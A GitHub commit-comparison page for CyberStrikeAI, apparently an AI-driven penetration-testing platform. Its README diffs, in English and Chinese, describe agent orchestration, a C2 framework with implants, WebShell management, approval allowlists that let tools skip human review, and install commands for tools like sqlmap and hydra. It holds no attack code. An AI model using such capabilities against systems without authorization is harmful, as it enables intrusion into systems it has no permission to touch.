Compare commits

...

110 Commits

Author SHA1 Message Date
公明 ed479d5e4d Update config.yaml 2026-06-18 12:53:56 +08:00
公明 a49f595231 Update config.yaml 2026-06-18 12:49:38 +08:00
公明 82cf014a5e Update config.yaml 2026-06-18 12:48:07 +08:00
公明 508de5fad0 Add files via upload 2026-06-18 12:47:24 +08:00
公明 6712344411 Add files via upload 2026-06-18 12:46:46 +08:00
公明 7eadccbff6 Add files via upload 2026-06-18 12:44:42 +08:00
公明 01b361e4a7 Add files via upload 2026-06-18 12:42:56 +08:00
公明 f6ce31c961 Delete internal/图片画质提升.jpeg 2026-06-18 12:41:18 +08:00
公明 d5a0f93c6c Add files via upload 2026-06-18 12:40:54 +08:00
公明 56faefaaf9 Add files via upload 2026-06-18 12:39:09 +08:00
公明 16e9c5874a Delete internal/图片画质提升.jpeg 2026-06-18 12:38:53 +08:00
公明 41b5cdde6b Add files via upload 2026-06-18 12:38:36 +08:00
公明 cf1f8515d9 Delete internal directory 2026-06-18 12:37:39 +08:00
公明 5e2b30c029 Add files via upload 2026-06-17 14:00:23 +08:00
公明 8c7c22369e Add files via upload 2026-06-17 12:30:20 +08:00
公明 9b1aba692b Add files via upload 2026-06-17 12:08:23 +08:00
公明 db730b48c1 Add files via upload 2026-06-17 12:06:23 +08:00
公明 dfb7dd7390 Add files via upload 2026-06-17 12:04:17 +08:00
公明 9f6eb33047 Add files via upload 2026-06-17 12:02:24 +08:00
公明 616d87f4cc Add files via upload 2026-06-17 10:50:19 +08:00
公明 8d999792b8 Update config.yaml 2026-06-16 16:22:14 +08:00
公明 afae8970d1 Add files via upload 2026-06-16 16:21:24 +08:00
公明 4d7330c5c3 Add files via upload 2026-06-16 15:48:11 +08:00
公明 8884bfb0b4 Add files via upload 2026-06-16 13:07:04 +08:00
公明 fb351c80b6 Add files via upload 2026-06-15 22:06:46 +08:00
公明 664834e338 Add files via upload 2026-06-15 22:03:29 +08:00
公明 95bf62db88 Add files via upload 2026-06-15 21:56:42 +08:00
公明 656242614d Add files via upload 2026-06-15 21:41:02 +08:00
公明 a9d6d8c00e Add files via upload 2026-06-15 21:30:39 +08:00
公明 0d6a43c0a8 Add files via upload 2026-06-15 20:43:51 +08:00
公明 702f286eb1 Add files via upload 2026-06-15 20:24:17 +08:00
公明 f4906543a8 Update config.yaml 2026-06-15 11:55:49 +08:00
公明 b073421637 Add files via upload 2026-06-15 11:55:04 +08:00
公明 08436c27aa Add files via upload 2026-06-15 11:49:53 +08:00
公明 25ce0b221f Add files via upload 2026-06-14 21:07:51 +08:00
公明 87e629f270 Add files via upload 2026-06-14 20:19:52 +08:00
公明 04f8d73b0e Add files via upload 2026-06-14 19:58:04 +08:00
公明 33e4f023b5 Add files via upload 2026-06-14 19:48:07 +08:00
公明 fc2e822448 Add files via upload 2026-06-14 19:46:13 +08:00
公明 7487c45799 Add files via upload 2026-06-14 19:43:59 +08:00
公明 6c4b3bf131 Add files via upload 2026-06-14 19:42:14 +08:00
公明 54cea1b172 Add files via upload 2026-06-13 19:56:09 +08:00
公明 b8775997e4 Add files via upload 2026-06-13 12:32:30 +08:00
公明 4223ec47f9 Add files via upload 2026-06-13 12:27:21 +08:00
公明 9887589d99 Add files via upload 2026-06-13 12:15:55 +08:00
公明 b7c01f41c7 Add files via upload 2026-06-13 12:08:04 +08:00
公明 1d3b4c44e1 Update config.yaml 2026-06-12 22:11:49 +08:00
公明 cbd64173b8 Add files via upload 2026-06-12 22:10:10 +08:00
公明 af71c6aa24 Add files via upload 2026-06-12 22:08:15 +08:00
公明 97a73a1cb6 Add files via upload 2026-06-12 22:06:41 +08:00
公明 83e1c707ca Add files via upload 2026-06-12 22:04:57 +08:00
公明 96ccbff77c Add files via upload 2026-06-12 21:28:51 +08:00
公明 c4bd8b93f6 Delete install-tools.sh 2026-06-12 21:26:22 +08:00
公明 d005268d28 Add files via upload 2026-06-12 19:43:38 +08:00
公明 7f4e8d2ad2 Add files via upload 2026-06-12 19:41:47 +08:00
公明 f3be355820 Add files via upload 2026-06-12 19:39:01 +08:00
公明 bf0ce33e3f Add files via upload 2026-06-12 19:36:45 +08:00
公明 4661862a1a Add files via upload 2026-06-11 18:03:09 +08:00
公明 f319a0f243 Add files via upload 2026-06-11 18:01:38 +08:00
公明 15c4802319 Add files via upload 2026-06-11 17:18:58 +08:00
公明 6ffde48b0c Add files via upload 2026-06-11 16:54:36 +08:00
公明 c5e2f0d95d Add files via upload 2026-06-11 16:02:48 +08:00
公明 28a826d5b7 Add files via upload 2026-06-11 15:56:25 +08:00
公明 6365de7018 Add files via upload 2026-06-11 11:50:31 +08:00
公明 2e4bf7197b Add files via upload 2026-06-11 11:48:17 +08:00
公明 ed4ba08163 Add files via upload 2026-06-11 11:46:23 +08:00
公明 8b5e55a673 Add files via upload 2026-06-11 11:44:20 +08:00
公明 e8a75e5105 Update config.yaml 2026-06-11 02:03:03 +08:00
公明 48976ed650 Add files via upload 2026-06-11 01:48:42 +08:00
公明 dc9ecae7fd Add files via upload 2026-06-11 01:43:35 +08:00
公明 a9d0a59f7a Add files via upload 2026-06-11 01:41:57 +08:00
公明 5ec4729b83 Add files via upload 2026-06-11 01:40:00 +08:00
公明 9857003018 Add files via upload 2026-06-11 01:38:25 +08:00
公明 a6e7885fed Add files via upload 2026-06-11 01:31:18 +08:00
公明 e69375451c Add files via upload 2026-06-11 01:29:07 +08:00
公明 07e7f104ad Add files via upload 2026-06-11 01:27:50 +08:00
公明 ffce9185bb Add files via upload 2026-06-11 01:16:20 +08:00
公明 612f16455d Add files via upload 2026-06-11 01:14:52 +08:00
公明 ecd5b40bc2 Add files via upload 2026-06-11 01:13:11 +08:00
公明 5aa7306c9b Update config.yaml 2026-06-11 00:53:39 +08:00
公明 1027d9f6cf Update config.yaml 2026-06-11 00:41:27 +08:00
公明 e05b008903 Add files via upload 2026-06-11 00:38:00 +08:00
公明 9bcc7a27fe Add files via upload 2026-06-11 00:35:44 +08:00
公明 fb3087b760 Add files via upload 2026-06-10 14:20:24 +08:00
公明 cd48a43b7e Add files via upload 2026-06-10 14:18:17 +08:00
公明 07be48ae59 Add files via upload 2026-06-10 14:06:33 +08:00
公明 529f94a4f7 Add files via upload 2026-06-10 11:33:05 +08:00
公明 d2fe023d7e Delete internal/database/project_fact_version.go 2026-06-10 11:19:21 +08:00
公明 09e858619e Add files via upload 2026-06-10 11:17:29 +08:00
公明 9c54291295 Add files via upload 2026-06-10 11:14:32 +08:00
公明 b3f7b8494b Delete web/static/js/knowledge.js.bak 2026-06-09 21:06:14 +08:00
公明 849c644a86 Add files via upload 2026-06-09 21:05:29 +08:00
公明 9e0525abc1 Add files via upload 2026-06-09 20:44:41 +08:00
公明 6bacac2e6a Add files via upload 2026-06-09 20:27:45 +08:00
公明 244307b52c Add files via upload 2026-06-09 20:26:18 +08:00
公明 faaac5fbd7 Add files via upload 2026-06-09 20:24:53 +08:00
公明 3392fefedf Add files via upload 2026-06-09 20:23:09 +08:00
公明 abef51b805 Add files via upload 2026-06-09 18:05:29 +08:00
公明 8143d8f220 Add files via upload 2026-06-09 17:53:37 +08:00
公明 73337c5226 Add files via upload 2026-06-09 17:44:39 +08:00
公明 c9c9ca1eec Add files via upload 2026-06-09 17:39:27 +08:00
公明 25f8b610fb Add files via upload 2026-06-09 17:37:04 +08:00
公明 6bfa7b8959 Add files via upload 2026-06-09 17:34:36 +08:00
公明 99a41d8188 Add files via upload 2026-06-09 14:32:11 +08:00
公明 6d04753761 Add files via upload 2026-06-09 14:28:15 +08:00
公明 a08df7ab79 Add files via upload 2026-06-09 14:23:08 +08:00
公明 3123a07c48 Update config.yaml 2026-06-09 14:03:09 +08:00
公明 7b3d35fabe Add files via upload 2026-06-09 13:39:22 +08:00
公明 cb17d3a5c1 Add files via upload 2026-06-09 11:03:51 +08:00
公明 c2892ccd33 Add files via upload 2026-06-08 15:55:03 +08:00
129 changed files with 16511 additions and 6349 deletions
+20 -13
View File
@@ -29,7 +29,6 @@ If CyberStrikeAI helps you, you can support the project via **WeChat Pay** or **
CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, comprehensive lifecycle management capabilities, and a **built-in lightweight C2 (Command & Control) framework** for **authorized** engagements (listeners, encrypted implants, sessions, tasks, real-time events, REST and MCP). Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams. CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, comprehensive lifecycle management capabilities, and a **built-in lightweight C2 (Command & Control) framework** for **authorized** engagements (listeners, encrypted implants, sessions, tasks, real-time events, REST and MCP). Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams.
## Interface & Integration Preview ## Interface & Integration Preview
<div align="center"> <div align="center">
@@ -117,9 +116,9 @@ CyberStrikeAI is an **AI-native security testing platform** built in Go. It inte
- 🛡️ Vulnerability management with CRUD operations, severity tracking, status workflow, and statistics - 🛡️ Vulnerability management with CRUD operations, severity tracking, status workflow, and statistics
- 📋 Batch task management: create task queues, add multiple tasks, and execute them sequentially - 📋 Batch task management: create task queues, add multiple tasks, and execute them sequentially
- 🎭 Role-based testing: predefined security testing roles (Penetration Testing, CTF, Web App Scanning, etc.) with custom prompts and tool restrictions - 🎭 Role-based testing: predefined security testing roles (Penetration Testing, CTF, Web App Scanning, etc.) with custom prompts and tool restrictions
- 🧩 **Agent orchestration (CloudWeGo Eino)**: **single-agent** via **`/api/eino-agent/stream`** (Eino ADK `ChatModelAgent`); **multi-agent** via **`/api/multi-agent/stream`** with **`deep`** (coordinator + `task` sub-agents), **`plan_execute`**, or **`supervisor`** (`orchestration` in the request body). Markdown under `agents/`: `orchestrator.md`, `orchestrator-plan-execute.md`, `orchestrator-supervisor.md`, plus sub-agent `*.md` (see [Multi-agent doc](docs/MULTI_AGENT_EINO.md)) - 🧩 **Agent orchestration (CloudWeGo Eino)**: **single-agent** via **`/api/eino-agent/stream`** (Eino ADK `ChatModelAgent`); **multi-agent** via **`/api/multi-agent/stream`** with **`deep`** (coordinator + `task` sub-agents), **`plan_execute`**, or **`supervisor`** (`orchestration` in the request body). ADK **summarization** compresses long contexts; pre-compaction **transcripts** land at `data/conversation_artifacts/<conversation-id>/summarization/transcript.txt` (full user/assistant/tool turns; static system omitted). Markdown under `agents/`: `orchestrator.md`, `orchestrator-plan-execute.md`, `orchestrator-supervisor.md`, plus sub-agent `*.md` (see [Multi-agent doc](docs/MULTI_AGENT_EINO.md))
- 🖼️ **Vision analysis (`analyze_image`)**: separate VL model (e.g. `qwen-vl-max`) via MCP for local screenshots, captchas, and UI; image bytes stay out of agent history (text summaries only). Configure `vision` in `config.yaml`; see [docs/VISION.md](docs/VISION.md) - 🖼️ **Vision analysis (`analyze_image`)**: separate VL model (e.g. `qwen-vl-max`) via MCP for local screenshots, captchas, and UI; image bytes stay out of agent history (text summaries only). Configure `vision` in `config.yaml`; see [docs/VISION.md](docs/VISION.md)
- 🎯 **Skills (refactored for Eino)**: packs under `skills_dir` follow **Agent Skills** layout (`SKILL.md` + optional files); **multi-agent** sessions use the official Eino ADK **`skill`** tool for **progressive disclosure** (load by name), with optional **host filesystem / shell** via `multi_agent.eino_skills`; optional **`eino_middleware`** adds patchtoolcalls, tool_search, plantask, reduction, checkpoints, and Deep tuning—20+ sample domains (SQLi, XSS, API security, …) ship under `skills/` - 🎯 **Skills (refactored for Eino)**: packs under `skills_dir` follow **Agent Skills** layout (`SKILL.md` + optional files); **multi-agent** sessions use the official Eino ADK **`skill`** tool for **progressive disclosure** (load by name), with optional **host filesystem / shell** via `multi_agent.eino_skills`; optional **`eino_middleware`** adds patchtoolcalls, tool_search, **plantask** (`TaskCreate` / `TaskList` boards under `skills_dir/.eino/plantask/`), reduction, file **checkpoints** (`checkpoint_dir`), ChatModel **retries**, session **output key**, and Deep tuning—20+ sample domains (SQLi, XSS, API security, …) ship under `skills/`
- 📱 **Chatbot**: DingTalk and Lark (Feishu) long-lived connections so you can talk to CyberStrikeAI from mobile (see [Robot / Chatbot guide](docs/robot_en.md) for setup and commands) - 📱 **Chatbot**: DingTalk and Lark (Feishu) long-lived connections so you can talk to CyberStrikeAI from mobile (see [Robot / Chatbot guide](docs/robot_en.md) for setup and commands)
- 🧑‍⚖️ **Human-in-the-loop (HITL)**: Chat sidebar to set approval mode and tool allowlists (listed tools skip approval); global list in `config.yaml` under `hitl.tool_whitelist`; **Apply** can merge new tools into the file and update the running server without restart; dedicated **HITL** page for pending approvals - 🧑‍⚖️ **Human-in-the-loop (HITL)**: Chat sidebar to set approval mode and tool allowlists (listed tools skip approval); global list in `config.yaml` under `hitl.tool_whitelist`; **Apply** can merge new tools into the file and update the running server without restart; dedicated **HITL** page for pending approvals
- 🐚 **WebShell management**: Add and manage WebShell connections (e.g. IceSword/AntSword compatible), use a virtual terminal for command execution, a built-in file manager for file operations, and an AI assistant tab that orchestrates tests and keeps per-connection conversation history; supports PHP, ASP, ASPX, JSP and custom shell types with configurable request method and command parameter. - 🐚 **WebShell management**: Add and manage WebShell connections (e.g. IceSword/AntSword compatible), use a virtual terminal for command execution, a built-in file manager for file operations, and an AI assistant tab that orchestrates tests and keeps per-connection conversation history; supports PHP, ASP, ASPX, JSP and custom shell types with configurable request method and command parameter.
@@ -190,14 +189,21 @@ The `run.sh` script will automatically:
``` ```
- Or edit `config.yaml` directly before launching - Or edit `config.yaml` directly before launching
2. **Login** - Use the auto-generated password shown in the console (or set `auth.password` in `config.yaml`) 2. **Login** - Use the auto-generated password shown in the console (or set `auth.password` in `config.yaml`)
3. **Install security tools (optional)** - Install tools as needed: 3. **Install security tools (optional)** - Install tools from `tools/` as needed; missing tools are skipped or substituted at runtime. Common examples:
**macOS (Homebrew):**
```bash ```bash
# macOS brew install nmap masscan sqlmap nikto gobuster ffuf hydra hashcat nuclei subfinder
brew install nmap sqlmap nuclei httpx gobuster feroxbuster subfinder amass
# Ubuntu/Debian
sudo apt-get install nmap sqlmap nuclei httpx gobuster feroxbuster
``` ```
AI automatically falls back to alternatives when a tool is missing.
**Linux (Kali / Debian / Ubuntu):**
```bash
sudo apt update
sudo apt install -y nmap masscan sqlmap nikto gobuster hydra hashcat john binwalk
# On some distros, install ffuf/nuclei/subfinder via go install or upstream docs
```
See the `tools/` directory for the full list; refer to each tool's official docs for install details.
**Alternative Launch Methods:** **Alternative Launch Methods:**
```bash ```bash
@@ -260,7 +266,7 @@ Requirements / tips:
- **Predefined roles** System includes 12+ predefined security testing roles (Penetration Testing, CTF, Web App Scanning, API Security Testing, Binary Analysis, Cloud Security Audit, etc.) in the `roles/` directory. - **Predefined roles** System includes 12+ predefined security testing roles (Penetration Testing, CTF, Web App Scanning, API Security Testing, Binary Analysis, Cloud Security Audit, etc.) in the `roles/` directory.
- **Custom prompts** Each role can define a `user_prompt` that prepends to user messages, guiding the AI to adopt specialized testing methodologies and focus areas. - **Custom prompts** Each role can define a `user_prompt` that prepends to user messages, guiding the AI to adopt specialized testing methodologies and focus areas.
- **Tool restrictions** Roles can specify a `tools` list to limit available tools, ensuring focused testing workflows (e.g., CTF role restricts to CTF-specific utilities). - **Tool restrictions** Roles can specify a `tools` list to limit available tools, ensuring focused testing workflows (e.g., CTF role restricts to CTF-specific utilities).
- **Skills** Skill packs live under `skills_dir` and load via the Eino ADK **`skill`** tool (**progressive disclosure**) in both **single- and multi-agent** sessions when **`multi_agent.eino_skills`** is enabled. Optional host **read_file / glob / grep / write / edit / execute** and **`eino_middleware`** (tool_search, reduction, checkpoints, etc.) apply per mode—see docs. - **Skills** Skill packs live under `skills_dir` and load via the Eino ADK **`skill`** tool (**progressive disclosure**) in both **single- and multi-agent** sessions when **`multi_agent.eino_skills`** is enabled. Optional host **read_file / glob / grep / write / edit / execute** and **`eino_middleware`** (tool_search, plantask, reduction, checkpoints, summarization transcripts, etc.) apply per mode—see docs.
- **Easy role creation** Create custom roles by adding YAML files to the `roles/` directory. Each role defines `name`, `description`, `user_prompt`, `icon`, `tools`, and `enabled` fields. - **Easy role creation** Create custom roles by adding YAML files to the `roles/` directory. Each role defines `name`, `description`, `user_prompt`, `icon`, `tools`, and `enabled` fields.
- **Web UI integration** Select roles from a dropdown in the chat interface. Role selection affects both AI behavior and available tool suggestions. - **Web UI integration** Select roles from a dropdown in the chat interface. Role selection affects both AI behavior and available tool suggestions.
@@ -288,6 +294,7 @@ Requirements / tips:
- **Sub-agents** (for **deep** / **supervisor**): other `*.md` files (YAML front matter + body). Not used as **`task`** targets if marked orchestrator-only. - **Sub-agents** (for **deep** / **supervisor**): other `*.md` files (YAML front matter + body). Not used as **`task`** targets if marked orchestrator-only.
- **Management** Web UI: **Agents → Agent management**; API `/api/multi-agent/markdown-agents`. - **Management** Web UI: **Agents → Agent management**; API `/api/multi-agent/markdown-agents`.
- **Config** `multi_agent` in `config.yaml`: `enabled`, `robot_default_agent_mode`, `batch_use_multi_agent`, `max_iteration`, `plan_execute_loop_max_iterations`, per-mode orchestrator instruction fields, optional YAML `sub_agents` merged with disk (`id` clash → Markdown wins), **`eino_skills`**, **`eino_middleware`** (optional ADK middleware and Deep/Supervisor tuning). - **Config** `multi_agent` in `config.yaml`: `enabled`, `robot_default_agent_mode`, `batch_use_multi_agent`, `max_iteration`, `plan_execute_loop_max_iterations`, per-mode orchestrator instruction fields, optional YAML `sub_agents` merged with disk (`id` clash → Markdown wins), **`eino_skills`**, **`eino_middleware`** (optional ADK middleware and Deep/Supervisor tuning).
- **Resilience & long runs** `checkpoint_dir` enables ADK **resume** after process crashes (distinct from trace-based “interrupt & continue”). `deep_model_retry_max_retries` retries transient LLM API failures within a single call. **Summarization** writes a filtered **transcript** when compression fires; the summary message includes the path so the model can `read_file` for scan output and other pre-compaction details.
- **Details** **[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)** (streaming, robots, batch, middleware caveats). - **Details** **[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)** (streaming, robots, batch, middleware caveats).
### Skills System (Agent Skills + Eino) ### Skills System (Agent Skills + Eino)
@@ -295,7 +302,7 @@ Requirements / tips:
- **Runtime refactor** **`skills_dir`** is the single root for packs. **Multi-agent** loads them through Einos official **`skill`** middleware (**progressive disclosure**: model calls `skill` with a pack **name** instead of receiving full SKILL text up front). Configure via **`multi_agent.eino_skills`**: `disable`, `filesystem_tools` (host read/glob/grep/write/edit/execute), `skill_tool_name`. - **Runtime refactor** **`skills_dir`** is the single root for packs. **Multi-agent** loads them through Einos official **`skill`** middleware (**progressive disclosure**: model calls `skill` with a pack **name** instead of receiving full SKILL text up front). Configure via **`multi_agent.eino_skills`**: `disable`, `filesystem_tools` (host read/glob/grep/write/edit/execute), `skill_tool_name`.
- **Eino / RAG** Packages are also split into `schema.Document` chunks for `FilesystemSkillsRetriever` (`skills.AsEinoRetriever()`) in **compose** graphs (e.g. knowledge/indexing pipelines). - **Eino / RAG** Packages are also split into `schema.Document` chunks for `FilesystemSkillsRetriever` (`skills.AsEinoRetriever()`) in **compose** graphs (e.g. knowledge/indexing pipelines).
- **HTTP API** `/api/skills` listing and `depth` (`summary` | `full`), `section`, and `resource_path` remain for the web UI and ops; **model-side** skill loading in multi-agent uses the **`skill`** tool, not MCP. - **HTTP API** `/api/skills` listing and `depth` (`summary` | `full`), `section`, and `resource_path` remain for the web UI and ops; **model-side** skill loading in multi-agent uses the **`skill`** tool, not MCP.
- **Optional `eino_middleware`** e.g. `tool_search` (dynamic MCP tool list), `patch_tool_calls`, `plantask` (structured tasks; persistence defaults under a subdirectory of `skills_dir`), `reduction`, `checkpoint_dir`, Deep output key / model retries / task-tool description prefix—see `config.yaml` and `internal/config/config.go`. - **Optional `eino_middleware`** e.g. `tool_search` (dynamic MCP tool list), `patch_tool_calls`, **`plantask`** (Eino `TaskCreate` / `TaskGet` / `TaskUpdate` / `TaskList`; JSON under `skills_dir/.eino/plantask/<conversation-id>/`; Eino clears task files when **all** tasks are marked completed), `reduction`, **`checkpoint_dir`** (`data/eino-checkpoints/`), **`deep_model_retry_max_retries`**, **`deep_output_key`**, task-tool description prefix—see `config.yaml` and `internal/config/config.go`.
- **Shipped demo** `skills/cyberstrike-eino-demo/`; see `skills/README.md`. - **Shipped demo** `skills/cyberstrike-eino-demo/`; see `skills/README.md`.
**Creating a skill:** **Creating a skill:**
@@ -305,7 +312,7 @@ Requirements / tips:
### Tool Orchestration & Extensions ### Tool Orchestration & Extensions
- **YAML recipes** in `tools/*.yaml` describe commands, arguments, prompts, and metadata. - **YAML recipes** in `tools/*.yaml` describe commands, arguments, prompts, and metadata.
- **Directory hot-reload** pointing `security.tools_dir` to a folder is usually enough; inline definitions in `config.yaml` remain supported for quick experiments. - **Directory hot-reload** pointing `security.tools_dir` to a folder is usually enough; inline definitions in `config.yaml` remain supported for quick experiments.
- **Large-result pagination** outputs beyond 200 KB are stored as artifacts retrievable through the `query_execution_result` tool with paging, filters, and regex search. - **Large tool outputs** outputs beyond `reduction_max_length_for_trunc` are summarized via Eino reduction with full content persisted under `tmp/reduction/`; use `read_file` on the path in `<persisted-output>`.
- **Result compression** multi-megabyte logs can be summarized or losslessly compressed before persisting to keep SQLite lean. - **Result compression** multi-megabyte logs can be summarized or losslessly compressed before persisting to keep SQLite lean.
**Creating a custom tool (typical flow)** **Creating a custom tool (typical flow)**
@@ -543,7 +550,7 @@ multi_agent:
orchestrator_instruction: "" # Deep; used when orchestrator.md body is empty orchestrator_instruction: "" # Deep; used when orchestrator.md body is empty
# orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor optional # orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor optional
# eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill } # eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill }
# eino_middleware: optional patch_tool_calls, tool_search, plantask, reduction, checkpoint_dir, ... # eino_middleware: plantask_enable, checkpoint_dir, deep_model_retry_max_retries, deep_output_key, ...
``` ```
### Tool Definition Example (`tools/nmap.yaml`) ### Tool Definition Example (`tools/nmap.yaml`)
+20 -13
View File
@@ -28,7 +28,6 @@
CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能、完整的测试生命周期管理能力,以及面向 **授权场景****内置轻量 C2Command & Control,指挥与控制)** 能力(监听器、加密通信、会话与任务、实时事件、REST 与 MCP 协同)。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。 CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能、完整的测试生命周期管理能力,以及面向 **授权场景****内置轻量 C2Command & Control,指挥与控制)** 能力(监听器、加密通信、会话与任务、实时事件、REST 与 MCP 协同)。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。
## 界面与集成预览 ## 界面与集成预览
<div align="center"> <div align="center">
@@ -116,9 +115,9 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
- 🛡️ 漏洞管理功能:完整的漏洞 CRUD 操作,支持严重程度分级、状态流转、按对话/严重程度/状态过滤,以及统计看板 - 🛡️ 漏洞管理功能:完整的漏洞 CRUD 操作,支持严重程度分级、状态流转、按对话/严重程度/状态过滤,以及统计看板
- 📋 批量任务管理:创建任务队列,批量添加任务,依次顺序执行,支持任务编辑与状态跟踪 - 📋 批量任务管理:创建任务队列,批量添加任务,依次顺序执行,支持任务编辑与状态跟踪
- 🎭 角色化测试:预设安全测试角色(渗透测试、CTF、Web 应用扫描等),支持自定义提示词和工具限制 - 🎭 角色化测试:预设安全测试角色(渗透测试、CTF、Web 应用扫描等),支持自定义提示词和工具限制
- 🧩 **Agent 编排(CloudWeGo Eino****单代理** `POST /api/eino-agent/stream`Eino ADK);**多代理** `POST /api/multi-agent/stream``orchestration`**`deep`** / **`plan_execute`** / **`supervisor`**。`agents/` 下主代理与子代理 Markdown 见 [多代理说明](docs/MULTI_AGENT_EINO.md) - 🧩 **Agent 编排(CloudWeGo Eino****单代理** `POST /api/eino-agent/stream`Eino ADK);**多代理** `POST /api/multi-agent/stream``orchestration`**`deep`** / **`plan_execute`** / **`supervisor`**。ADK **Summarization** 在上下文过长时压缩历史;压缩前将可恢复 **转录** 写入 `data/conversation_artifacts/<会话ID>/summarization/transcript.txt`(保留完整 user/assistant/tool 轮次,省略静态 system)。`agents/` 下主代理与子代理 Markdown 见 [多代理说明](docs/MULTI_AGENT_EINO.md)
- 🖼️ **视觉分析(`analyze_image`**:独立 Vision 模型(如 `qwen-vl-max`),MCP 工具分析本地截图/验证码/UI;图片仅在单次 VL 调用中出现,对话上下文只保留文字摘要。配置见 `config.yaml``vision` 与 [视觉分析说明](docs/VISION.md) - 🖼️ **视觉分析(`analyze_image`**:独立 Vision 模型(如 `qwen-vl-max`),MCP 工具分析本地截图/验证码/UI;图片仅在单次 VL 调用中出现,对话上下文只保留文字摘要。配置见 `config.yaml``vision` 与 [视觉分析说明](docs/VISION.md)
- 🎯 **Skills(面向 Eino 重构)**:技能包放在 **`skills_dir`**,遵循 **Agent Skills** 目录规范(`SKILL.md` + 可选文件);**多代理** 下通过 Eino 官方 **`skill`** 工具 **渐进式披露**(按 name 加载)。**`multi_agent.eino_skills`** 控制是否启用、本机文件/Shell 工具、工具名覆盖;**`eino_middleware`** 可选 patch、tool_search、plantask、reduction、断点目录及 Deep 调参。20+ 领域示例仍可绑定角色 - 🎯 **Skills(面向 Eino 重构)**:技能包放在 **`skills_dir`**,遵循 **Agent Skills** 目录规范(`SKILL.md` + 可选文件);**多代理** 下通过 Eino 官方 **`skill`** 工具 **渐进式披露**(按 name 加载)。**`multi_agent.eino_skills`** 控制是否启用、本机文件/Shell 工具、工具名覆盖;**`eino_middleware`** 可选 patch、tool_search、**plantask**`TaskCreate` / `TaskList` 任务板,落在 `skills_dir/.eino/plantask/`)、reduction、文件型 **checkpoint**`checkpoint_dir`)、ChatModel **重试**、会话 **输出键** 及 Deep 调参。20+ 领域示例仍可绑定角色
- 📱 **机器人**:支持钉钉、飞书长连接,在手机端与 CyberStrikeAI 对话(配置与命令详见 [机器人使用说明](docs/robot.md) - 📱 **机器人**:支持钉钉、飞书长连接,在手机端与 CyberStrikeAI 对话(配置与命令详见 [机器人使用说明](docs/robot.md)
- 🧑‍⚖️ **人机协同(HITL**:对话页侧栏配置协同模式与免审批工具白名单;全局列表在 `config.yaml``hitl.tool_whitelist`;点「应用」可将新增工具合并写入配置文件且**无需重启**即可生效;导航 **人机协同** 页处理待审批工具调用 - 🧑‍⚖️ **人机协同(HITL**:对话页侧栏配置协同模式与免审批工具白名单;全局列表在 `config.yaml``hitl.tool_whitelist`;点「应用」可将新增工具合并写入配置文件且**无需重启**即可生效;导航 **人机协同** 页处理待审批工具调用
- 🐚 **WebShell 管理**:添加与管理 WebShell 连接(兼容冰蝎/蚁剑等),通过虚拟终端执行命令、内置文件管理进行文件操作,并提供按连接维度保存历史的 AI 助手标签页;支持 PHP/ASP/ASPX/JSP 及自定义类型,可配置请求方法与命令参数。 - 🐚 **WebShell 管理**:添加与管理 WebShell 连接(兼容冰蝎/蚁剑等),通过虚拟终端执行命令、内置文件管理进行文件操作,并提供按连接维度保存历史的 AI 助手标签页;支持 PHP/ASP/ASPX/JSP 及自定义类型,可配置请求方法与命令参数。
@@ -189,14 +188,21 @@ chmod +x run.sh && ./run.sh
``` ```
- 或启动前直接编辑 `config.yaml` 文件 - 或启动前直接编辑 `config.yaml` 文件
2. **登录系统** - 使用控制台显示的自动生成密码(或在 `config.yaml` 中设置 `auth.password` 2. **登录系统** - 使用控制台显示的自动生成密码(或在 `config.yaml` 中设置 `auth.password`
3. **安装安全工具(可选)** - 按需安装所需工具 3. **安装安全工具(可选)** - 按需安装 `tools/` 目录中的工具;未安装的工具在执行时会自动跳过或改用替代方案。常用示例
**macOSHomebrew):**
```bash ```bash
# macOS brew install nmap masscan sqlmap nikto gobuster ffuf hydra hashcat nuclei subfinder
brew install nmap sqlmap nuclei httpx gobuster feroxbuster subfinder amass
# Ubuntu/Debian
sudo apt-get install nmap sqlmap nuclei httpx gobuster feroxbuster
``` ```
未安装的工具会自动跳过或改用替代方案。
**LinuxKali / Debian / Ubuntu):**
```bash
sudo apt update
sudo apt install -y nmap masscan sqlmap nikto gobuster hydra hashcat john binwalk
# 部分发行版需自行安装:ffuf、nuclei、subfinder 等可用 go install 或见各工具官网
```
完整工具列表见 `tools/` 目录;各工具安装方式以官方文档为准。
**其他启动方式:** **其他启动方式:**
```bash ```bash
@@ -258,7 +264,7 @@ go build -o cyberstrike-ai cmd/server/main.go
- **预设角色**:系统内置 12+ 个预设的安全测试角色(渗透测试、CTF、Web 应用扫描、API 安全测试、二进制分析、云安全审计等),位于 `roles/` 目录。 - **预设角色**:系统内置 12+ 个预设的安全测试角色(渗透测试、CTF、Web 应用扫描、API 安全测试、二进制分析、云安全审计等),位于 `roles/` 目录。
